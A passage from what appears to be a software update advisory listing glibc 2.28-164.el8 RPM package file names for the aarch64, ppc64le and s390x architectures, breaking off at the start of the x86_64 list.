\nglibc-langpack-mt-2.28-164.el8.aarch64.rpm\nglibc-langpack-my-2.28-164.el8.aarch64.rpm\nglibc-langpack-nan-2.28-164.el8.aarch64.rpm\nglibc-langpack-nb-2.28-164.el8.aarch64.rpm\nglibc-langpack-nds-2.28-164.el8.aarch64.rpm\nglibc-langpack-ne-2.28-164.el8.aarch64.rpm\nglibc-langpack-nhn-2.28-164.el8.aarch64.rpm\nglibc-langpack-niu-2.28-164.el8.aarch64.rpm\nglibc-langpack-nl-2.28-164.el8.aarch64.rpm\nglibc-langpack-nn-2.28-164.el8.aarch64.rpm\nglibc-langpack-nr-2.28-164.el8.aarch64.rpm\nglibc-langpack-nso-2.28-164.el8.aarch64.rpm\nglibc-langpack-oc-2.28-164.el8.aarch64.rpm\nglibc-langpack-om-2.28-164.el8.aarch64.rpm\nglibc-langpack-or-2.28-164.el8.aarch64.rpm\nglibc-langpack-os-2.28-164.el8.aarch64.rpm\nglibc-langpack-pa-2.28-164.el8.aarch64.rpm\nglibc-langpack-pap-2.28-164.el8.aarch64.rpm\nglibc-langpack-pl-2.28-164.el8.aarch64.rpm\nglibc-langpack-ps-2.28-164.el8.aarch64.rpm\nglibc-langpack-pt-2.28-164.el8.aarch64.rpm\nglibc-langpack-quz-2.28-164.el8.aarch64.rpm\nglibc-langpack-raj-2.28-164.el8.aarch64.rpm\nglibc-langpack-ro-2.28-164.el8.aarch64.rpm\nglibc-langpack-ru-2.28-164.el8.aarch64.rpm\nglibc-langpack-rw-2.28-164.el8.aarch64.rpm\nglibc-langpack-sa-2.28-164.el8.aarch64.rpm\nglibc-langpack-sah-2.28-164.el8.aarch64.rpm\nglibc-langpack-sat-2.28-164.el8.aarch64.rpm\nglibc-langpack-sc-2.28-164.el8.aarch64.rpm\nglibc-langpack-sd-2.28-164.el8.aarch64.rpm\nglibc-langpack-se-2.28-164.el8.aarch64.rpm\nglibc-langpack-sgs-2.28-164.el8.aarch64.rpm\nglibc-langpack-shn-2.28-164.el8.aarch64.rpm\nglibc-langpack-shs-2.28-164.el8.aarch64.rpm\nglibc-langpack-si-2.28-164.el8.aarch64.rpm\nglibc-langpack-sid-2.28-164.el8.aarch64.rpm\nglibc-langpack-sk-2.28-164.el8.aarch64.rpm\nglibc-langpack-sl-2.28-164.el8.aarch64.rpm\nglibc-langpack-sm-2.28-164.el8.aarch64.rpm\nglibc-langpack-so-2.28-164.el8.aarch64.rpm\nglibc-langpack-sq-2.28-164.el8.aarch64.rpm\nglibc-langpack-sr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ss-2.28-164.el8.aarch64.rpm\nglibc-langpack-st-2.28-164.el8.aarch64.rpm\nglibc-langpack-sv-2.28-164.el8.aarch64.rpm\nglibc-langpack-sw-2.28-164.el8.aarch64.rpm\nglibc-langpack-szl-2.28-164.el8.aarch64.rpm\nglibc-langpack-ta-2.28-164.el8.aarch64.rpm\nglibc-langpack-tcy-2.28-164.el8.aarch64.rpm\nglibc-langpack-te-2.28-164.el8.aarch64.rpm\nglibc-langpack-tg-2.28-164.el8.aarch64.rpm\nglibc-langpack-th-2.28-164.el8.aarch64.rpm\nglibc-langpack-the-2.28-164.el8.aarch64.rpm\nglibc-langpack-ti-2.28-164.el8.aarch64.rpm\nglibc-langpack-tig-2.28-164.el8.aarch64.rpm\nglibc-langpack-tk-2.28-164.el8.aarch64.rpm\nglibc-langpack-tl-2.28-164.el8.aarch64.rpm\nglibc-langpack-tn-2.28-164.el8.aarch64.rpm\nglibc-langpack-to-2.28-164.el8.aarch64.rpm\nglibc-langpack-tpi-2.28-164.el8.aarch64.rpm\nglibc-langpack-tr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ts-2.28-164.el8.aarch64.rpm\nglibc-langpack-tt-2.28-164.el8.aarch64.rpm\nglibc-langpack-ug-2.28-164.el8.aarch64.rpm\nglibc-langpack-uk-2.28-164.el8.aarch64.rpm\nglibc-langpack-unm-2.28-164.el8.aarch64.rpm\nglibc-langpack-ur-2.28-164.el8.aarch64.rpm\nglibc-langpack-uz-2.28-164.el8.aarch64.rpm\nglibc-langpack-ve-2.28-164.el8.aarch64.rpm\nglibc-langpack-vi-2.28-164.el8.aarch64.rpm\nglibc-langpack-wa-2.28-164.el8.aarch64.rpm\nglibc-langpack-wae-2.28-164.el8.aarch64.rpm\nglibc-langpack-wal-2.28-164.el8.aarch64.rpm\nglibc-langpack-wo-2.28-164.el8.aarch64.rpm\nglibc-langpack-xh-2.28-164.el8.aarch64.rpm\nglibc-langpack-yi-2.28-164.el8.aarch64.rpm\nglibc-langpack-yo-2.28-164.el8.aarch64.rpm\nglibc-langpack-yue-2.28-164.el8.aarch64.rpm\nglibc-langpack-yuw-2.28-164.el8.aarch64.rpm\nglibc-langpack-zh-2.28-164.el8.aarch64.rpm\nglibc-langpack-zu-2.28-164.el8.aarch64.rpm\nglibc-locale-source-2.28-164.el8.aarch64.rpm\nglibc-minimal-langpack-2.28-164.el8.aarch64.rpm\nlibnsl-2.28-164.el8.aarch64.rpm\nnscd-2.28-164.el8.aarch64.rpm\nnss_db-2.28-164.el8.aarch64.rpm\n\nppc64le:\nglibc-2.28-164.el8.ppc64le.rpm\nglibc-all-langpacks-2.28-164.el8.ppc64le.rpm\nglibc-common-2.28-164.el8.ppc64le.rpm\nglibc-debuginfo-2.28-164.el8.ppc64le.rpm\nglibc-debuginfo-common-2.28-164.el8.ppc64le.rpm\nglibc-devel-2.28-164.el8.ppc64le.rpm\nglibc-headers-2.28-164.el8.ppc64le.rpm\nglibc-langpack-aa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-af-2.28-164.el8.ppc64le.rpm\nglibc-langpack-agr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ak-2.28-164.el8.ppc64le.rpm\nglibc-langpack-am-2.28-164.el8.ppc64le.rpm\nglibc-langpack-an-2.28-164.el8.ppc64le.rpm\nglibc-langpack-anp-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ar-2.28-164.el8.ppc64le.rpm\nglibc-langpack-as-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ast-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ayc-2.28-164.el8.ppc64le.rpm\nglibc-langpack-az-2.28-164.el8.ppc64le.rpm\nglibc-langpack-be-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bem-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ber-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bhb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bho-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-br-2.28-164.el8.ppc64le.rpm\nglibc-langpack-brx-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-byn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ca-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ce-2.28-164.el8.ppc64le.rpm\nglibc-langpack-chr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cmn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-crh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-csb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-da-2.28-164.el8.ppc64le.rpm\nglibc-langpack-de-2.28-164.el8.ppc64le.rpm\nglibc-langpack-doi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-dsb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-dv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-dz-2.28-164.el8.ppc64le.rpm\nglibc-langpack-el-2.28-164.el8.ppc64le.rpm\nglibc-langpack-en-2.28-164.el8.ppc64le.rpm\nglibc-langpack-eo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-es-2.28-164.el8.ppc64le.rpm\nglibc-langpack-et-2.28-164.el8.ppc64le.rpm\nglibc-langpack-eu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ff-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fil-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fur-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ga-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gd-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gez-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ha-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hak-2.28-164.el8.ppc64le.rpm\nglibc-langpack-he-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hif-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hne-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hsb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ht-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ia-2.28-164.el8.ppc64le.rpm\nglibc-langpack-id-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ig-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ik-2.28-164.el8.ppc64le.rpm\nglibc-langpack-is-2.28-164.el8.ppc64le.rpm\nglibc-langpack-it-2.28-164.el8.ppc64le.rpm\nglibc-langpack-iu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ja-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ka-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kab-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-km-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ko-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kok-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ks-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ku-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ky-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-li-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lij-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ln-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lzh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mag-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mai-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mfe-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mhr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-miq-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mjw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ml-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mni-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ms-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-my-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nan-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nds-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ne-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nhn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-niu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nso-2.28-164.el8.ppc64le.rpm\nglibc-langpack-oc-2.28-164.el8.ppc64le.rpm\nglibc-langpack-om-2.28-164.el8.ppc64le.rpm\nglibc-langpack-or-2.28-164.el8.ppc64le.rpm\nglibc-langpack-os-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pap-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ps-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-quz-2.28-164.el8.ppc64le.rpm\nglibc-langpack-raj-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ro-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ru-2.28-164.el8.ppc64le.rpm\nglibc-langpack-rw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sah-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sat-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sc-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sd-2.28-164.el8.ppc64le.rpm\nglibc-langpack-se-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sgs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-shn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-shs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-si-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sid-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sm-2.28-164.el8.ppc64le.rpm\nglibc-langpack-so-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sq-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ss-2.28-164.el8.ppc64le.rpm\nglibc-langpack-st-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-szl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ta-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tcy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-te-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-th-2.28-164.el8.ppc64le.rpm\nglibc-langpack-the-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ti-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tig-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-to-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tpi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ts-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ug-2.28-164.el8.ppc64le.rpm\nglibc-langpack-uk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-unm-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ur-2.28-164.el8.ppc64le.rpm\nglibc-langpack-uz-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ve-2.28-164.el8.ppc64le.rpm\nglibc-langpack-vi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wae-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wal-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-xh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yue-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yuw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-zh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-zu-2.28-164.el8.ppc64le.rpm\nglibc-locale-source-2.28-164.el8.ppc64le.rpm\nglibc-minimal-langpack-2.28-164.el8.ppc64le.rpm\nlibnsl-2.28-164.el8.ppc64le.rpm\nnscd-2.28-164.el8.ppc64le.rpm\nnss_db-2.28-164.el8.ppc64le.rpm\n\ns390x:\nglibc-2.28-164.el8.s390x.rpm\nglibc-all-langpacks-2.28-164.el8.s390x.rpm\nglibc-common-2.28-164.el8.s390x.rpm\nglibc-debuginfo-2.28-164.el8.s390x.rpm\nglibc-debuginfo-common-2.28-164.el8.s390x.rpm\nglibc-devel-2.28-164.el8.s390x.rpm\nglibc-headers-2.28-164.el8.s390x.rpm\nglibc-langpack-aa-2.28-164.el8.s390x.rpm\nglibc-langpack-af-2.28-164.el8.s390x.rpm\nglibc-langpack-agr-2.28-164.el8.s390x.rpm\nglibc-langpack-ak-2.28-164.el8.s390x.rpm\nglibc-langpack-am-2.28-164.el8.s390x.rpm\nglibc-langpack-an-2.28-164.el8.s390x.rpm\nglibc-langpack-anp-2.28-164.el8.s390x.rpm\nglibc-langpack-ar-2.28-164.el8.s390x.rpm\nglibc-langpack-as-2.28-164.el8.s390x.rpm\nglibc-langpack-ast-2.28-164.el8.s390x.rpm\nglibc-langpack-ayc-2.28-164.el8.s390x.rpm\nglibc-langpack-az-2.28-164.el8.s390x.rpm\nglibc-langpack-be-2.28-164.el8.s390x.rpm\nglibc-langpack-bem-2.28-164.el8.s390x.rpm\nglibc-langpack-ber-2.28-164.el8.s390x.rpm\nglibc-langpack-bg-2.28-164.el8.s390x.rpm\nglibc-langpack-bhb-2.28-164.el8.s390x.rpm\nglibc-langpack-bho-2.28-164.el8.s390x.rpm\nglibc-langpack-bi-2.28-164.el8.s390x.rpm\nglibc-langpack-bn-2.28-164.el8.s390x.rpm\nglibc-langpack-bo-2.28-164.el8.s390x.rpm\nglibc-langpack-br-2.28-164.el8.s390x.rpm\nglibc-langpack-brx-2.28-164.el8.s390x.rpm\nglibc-langpack-bs-2.28-164.el8.s390x.rpm\nglibc-langpack-byn-2.28-164.el8.s390x.rpm\nglibc-langpack-ca-2.28-164.el8.s390x.rpm\nglibc-langpack-ce-2.28-164.el8.s390x.rpm\nglibc-langpack-chr-2.28-164.el8.s390x.rpm\nglibc-langpack-cmn-2.28-164.el8.s390x.rpm\nglibc-langpack-crh-2.28-164.el8.s390x.rpm\nglibc-langpack-cs-2.28-164.el8.s390x.rpm\nglibc-langpack-csb-2.28-164.el8.s390x.rpm\nglibc-langpack-cv-2.28-164.el8.s390x.rpm\nglibc-langpack-cy-2.28-164.el8.s390x.rpm\nglibc-langpack-da-2.28-164.el8.s390x.rpm\nglibc-langpack-de-2.28-164.el8.s390x.rpm\nglibc-langpack-doi-2.28-164.el8.s390x.rpm\nglibc-langpack-dsb-2.28-164.el8.s390x.rpm\nglibc-langpack-dv-2.28-164.el8.s390x.rpm\nglibc-langpack-dz-2.28-164.el8.s390x.rpm\nglibc-langpack-el-2.28-164.el8.s390x.rpm\nglibc-langpack-en-2.28-164.el8.s390x.rpm\nglibc-langpack-eo-2.28-164.el8.s390x.rpm\nglibc-langpack-es-2.28-164.el8.s390x.rpm\nglibc-langpack-et-2.28-164.el8.s390x.rpm\nglibc-langpack-eu-2.28-164.el8.s390x.rpm\nglibc-langpack-fa-2.28-164.el8.s390x.rpm\nglibc-langpack-ff-2.28-164.el8.s390x.rpm\nglibc-langpack-fi-2.28-164.el8.s390x.rpm\nglibc-langpack-fil-2.28-164.el8.s390x.rpm\nglibc-langpack-fo-2.28-164.el8.s390x.rpm\nglibc-langpack-fr-2.28-164.el8.s390x.rpm\nglibc-langpack-fur-2.28-164.el8.s390x.rpm\nglibc-langpack-fy-2.28-164.el8.s390x.rpm\nglibc-langpack-ga-2.28-164.el8.s390x.rpm\nglibc-langpack-gd-2.28-164.el8.s390x.rpm\nglibc-langpack-gez-2.28-164.el8.s390x.rpm\nglibc-langpack-gl-2.28-164.el8.s390x.rpm\nglibc-langpack-gu-2.28-164.el8.s390x.rpm\nglibc-langpack-gv-2.28-164.el8.s390x.rpm\nglibc-langpack-ha-2.28-164.el8.s390x.rpm\nglibc-langpack-hak-2.28-164.el8.s390x.rpm\nglibc-langpack-he-2.28-164.el8.s390x.rpm\nglibc-langpack-hi-2.28-164.el8.s390x.rpm\nglibc-langpack-hif-2.28-164.el8.s390x.rpm\nglibc-langpack-hne-2.28-164.el8.s390x.rpm\nglibc-langpack-hr-2.28-164.el8.s390x.rpm\nglibc-langpack-hsb-2.28-164.el8.s390x.rpm\nglibc-langpack-ht-2.28-164.el8.s390x.rpm\nglibc-langpack-hu-2.28-164.el8.s390x.rpm\nglibc-langpack-hy-2.28-164.el8.s390x.rpm\nglibc-langpack-ia-2.28-164.el8.s390x.rpm\nglibc-langpack-id-2.28-164.el8.s390x.rpm\nglibc-langpack-ig-2.28-164.el8.s390x.rpm\nglibc-langpack-ik-2.28-164.el8.s390x.rpm\nglibc-langpack-is-2.28-164.el8.s390x.rpm\nglibc-langpack-it-2.28-164.el8.s390x.rpm\nglibc-langpack-iu-2.28-164.el8.s390x.rpm\nglibc-langpack-ja-2.28-164.el8.s390x.rpm\nglibc-langpack-ka-2.28-164.el8.s390x.rpm\nglibc-langpack-kab-2.28-164.el8.s390x.rpm\nglibc-langpack-kk-2.28-164.el8.s390x.rpm\nglibc-langpack-kl-2.28-164.el8.s390x.rpm\nglibc-langpack-km-2.28-164.el8.s390x.rpm\nglibc-langpack-kn-2.28-164.el8.s390x.rpm\nglibc-langpack-ko-2.28-164.el8.s390x.rpm\nglibc-langpack-kok-2.28-164.el8.s390x.rpm\nglibc-langpack-ks-2.28-164.el8.s390x.rpm\nglibc-langpack-ku-2.28-164.el8.s390x.rpm\nglibc-langpack-kw-2.28-164.el8.s390x.rpm\nglibc-langpack-ky-2.28-164.el8.s390x.rpm\nglibc-langpack-lb-2.28-164.el8.s390x.rpm\nglibc-langpack-lg-2.28-164.el8.s390x.rpm\nglibc-langpack-li-2.28-164.el8.s390x.rpm\nglibc-langpack-lij-2.28-164.el8.s390x.rpm\nglibc-langpack-ln-2.28-164.el8.s390x.rpm\nglibc-langpack-lo-2.28-164.el8.s390x.rpm\nglibc-langpack-lt-2.28-164.el8.s390x.rpm\nglibc-langpack-lv-2.28-164.el8.s390x.rpm\nglibc-langpack-lzh-2.28-164.el8.s390x.rpm\nglibc-langpack-mag-2.28-164.el8.s390x.rpm\nglibc-langpack-mai-2.28-164.el8.s390x.rpm\nglibc-langpack-mfe-2.28-164.el8.s390x.rpm\nglibc-langpack-mg-2.28-164.el8.s390x.rpm\nglibc-langpack-mhr-2.28-164.el8.s390x.rpm\nglibc-langpack-mi-2.28-164.el8.s390x.rpm\nglibc-langpack-miq-2.28-164.el8.s390x.rpm\nglibc-langpack-mjw-2.28-164.el8.s390x.rpm\nglibc-langpack-mk-2.28-164.el8.s390x.rpm\nglibc-langpack-ml-2.28-164.el8.s390x.rpm\nglibc-langpack-mn-2.28-164.el8.s390x.rpm\nglibc-langpack-mni-2.28-164.el8.s390x.rpm\nglibc-langpack-mr-2.28-164.el8.s390x.rpm\nglibc-langpack-ms-2.28-164.el8.s390x.rpm\nglibc-langpack-mt-2.28-164.el8.s390x.rpm\nglibc-langpack-my-2.28-164.el8.s390x.rpm\nglibc-langpack-nan-2.28-164.el8.s390x.rpm\nglibc-langpack-nb-2.28-164.el8.s390x.rpm\nglibc-langpack-nds-2.28-164.el8.s390x.rpm\nglibc-langpack-ne-2.28-164.el8.s390x.rpm\nglibc-langpack-nhn-2.28-164.el8.s390x.rpm\nglibc-langpack-niu-2.28-164.el8.s390x.rpm\nglibc-langpack-nl-2.28-164.el8.s390x.rpm\nglibc-langpack-nn-2.28-164.el8.s390x.rpm\nglibc-langpack-nr-2.28-164.el8.s390x.rpm\nglibc-langpack-nso-2.28-164.el8.s390x.rpm\nglibc-langpack-oc-2.28-164.el8.s390x.rpm\nglibc-langpack-om-2.28-164.el8.s390x.rpm\nglibc-langpack-or-2.28-164.el8.s390x.rpm\nglibc-langpack-os-2.28-164.el8.s390x.rpm\nglibc-langpack-pa-2.28-164.el8.s390x.rpm\nglibc-langpack-pap-2.28-164.el8.s390x.rpm\nglibc-langpack-pl-2.28-164.el8.s390x.rpm\nglibc-langpack-ps-2.28-164.el8.s390x.rpm\nglibc-langpack-pt-2.28-164.el8.s390x.rpm\nglibc-langpack-quz-2.28-164.el8.s390x.rpm\nglibc-langpack-raj-2.28-164.el8.s390x.rpm\nglibc-langpack-ro-2.28-164.el8.s390x.rpm\nglibc-langpack-ru-2.28-164.el8.s390x.rpm\nglibc-langpack-rw-2.28-164.el8.s390x.rpm\nglibc-langpack-sa-2.28-164.el8.s390x.rpm\nglibc-langpack-sah-2.28-164.el8.s390x.rpm\nglibc-langpack-sat-2.28-164.el8.s390x.rpm\nglibc-langpack-sc-2.28-164.el8.s390x.rpm\nglibc-langpack-sd-2.28-164.el8.s390x.rpm\nglibc-langpack-se-2.28-164.el8.s390x.rpm\nglibc-langpack-sgs-2.28-164.el8.s390x.rpm\nglibc-langpack-shn-2.28-164.el8.s390x.rpm\nglibc-langpack-shs-2.28-164.el8.s390x.rpm\nglibc-langpack-si-2.28-164.el8.s390x.rpm\nglibc-langpack-sid-2.28-164.el8.s390x.rpm\nglibc-langpack-sk-2.28-164.el8.s390x.rpm\nglibc-langpack-sl-2.28-164.el8.s390x.rpm\nglibc-langpack-sm-2.28-164.el8.s390x.rpm\nglibc-langpack-so-2.28-164.el8.s390x.rpm\nglibc-langpack-sq-2.28-164.el8.s390x.rpm\nglibc-langpack-sr-2.28-164.el8.s390x.rpm\nglibc-langpack-ss-2.28-164.el8.s390x.rpm\nglibc-langpack-st-2.28-164.el8.s390x.rpm\nglibc-langpack-sv-2.28-164.el8.s390x.rpm\nglibc-langpack-sw-2.28-164.el8.s390x.rpm\nglibc-langpack-szl-2.28-164.el8.s390x.rpm\nglibc-langpack-ta-2.28-164.el8.s390x.rpm\nglibc-langpack-tcy-2.28-164.el8.s390x.rpm\nglibc-langpack-te-2.28-164.el8.s390x.rpm\nglibc-langpack-tg-2.28-164.el8.s390x.rpm\nglibc-langpack-th-2.28-164.el8.s390x.rpm\nglibc-langpack-the-2.28-164.el8.s390x.rpm\nglibc-langpack-ti-2.28-164.el8.s390x.rpm\nglibc-langpack-tig-2.28-164.el8.s390x.rpm\nglibc-langpack-tk-2.28-164.el8.s390x.rpm\nglibc-langpack-tl-2.28-164.el8.s390x.rpm\nglibc-langpack-tn-2.28-164.el8.s390x.rpm\nglibc-langpack-to-2.28-164.el8.s390x.rpm\nglibc-langpack-tpi-2.28-164.el8.s390x.rpm\nglibc-langpack-tr-2.28-164.el8.s390x.rpm\nglibc-langpack-ts-2.28-164.el8.s390x.rpm\nglibc-langpack-tt-2.28-164.el8.s390x.rpm\nglibc-langpack-ug-2.28-164.el8.s390x.rpm\nglibc-langpack-uk-2.28-164.el8.s390x.rpm\nglibc-langpack-unm-2.28-164.el8.s390x.rpm\nglibc-langpack-ur-2.28-164.el8.s390x.rpm\nglibc-langpack-uz-2.28-164.el8.s390x.rpm\nglibc-langpack-ve-2.28-164.el8.s390x.rpm\nglibc-langpack-vi-2.28-164.el8.s390x.rpm\nglibc-langpack-wa-2.28-164.el8.s390x.rpm\nglibc-langpack-wae-2.28-164.el8.s390x.rpm\nglibc-langpack-wal-2.28-164.el8.s390x.rpm\nglibc-langpack-wo-2.28-164.el8.s390x.rpm\nglibc-langpack-xh-2.28-164.el8.s390x.rpm\nglibc-langpack-yi-2.28-164.el8.s390x.rpm\nglibc-langpack-yo-2.28-164.el8.s390x.rpm\nglibc-langpack-yue-2.28-164.el8.s390x.rpm\nglibc-langpack-yuw-2.28-164.el8.s390x.rpm\nglibc-langpack-zh-2.28-164.el8.s390x.rpm\nglibc-langpack-zu-2.28-164.el8.s390x.rpm\nglibc-locale-source-2.28-164.el8.s390x.rpm\nglibc-minimal-langpack-2.28-164.el8.s390x.rpm\nlibnsl-2.28-164.el8.s390x.rpm\nnscd-2.28-164.el8.s390x.rpm\nnss_db-2.28-164.el8.s390x.rpm\n\nx86_64:\nglibc-2.28-164.el8.i686.rpm\